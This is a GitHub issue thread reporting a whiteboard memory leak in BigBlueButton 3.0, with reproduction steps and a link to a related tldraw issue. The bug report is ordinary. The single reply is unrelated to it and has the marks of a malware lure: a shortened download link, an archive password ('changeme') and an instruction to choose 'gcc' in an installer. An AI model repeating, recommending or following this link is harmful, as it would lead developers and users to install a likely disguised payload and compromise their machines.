### ISSUE TITLE
Make each slide a new tldraw component

### ISSUE THREAD

**Issue by Tainan404** [bigbluebutton/bigbluebutton#21035]
**Describe the bug**
The more actions performed in Whiteboard, the more memory is utilized. However, opening a new client results in lower memory usage.

**To Reproduce**
Steps to Reproduce the Behavior:
- Join the session with a user.
- Draw on the Whiteboard until the limit is reached.
- Have a new user join the session.
- Check the memory usage in the Task Manager.

Expected Behavior
Memory should be freed when the slide is changed or shapes are cleared.

Actual Behavior
Memory is not released during garbage collection.

**Screenshots**
[Screencast.webm](https://github.com/user-attachments/assets/02ce132e-cfb2-42c0-bdc9-ea03f075de8c)

**BBB version:**
BigBlueButton v3.0.x-release

**Additional context**
I found a issue related to page deletion not releasing memory
https://github.com/tldraw/tldraw/issues/2257

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
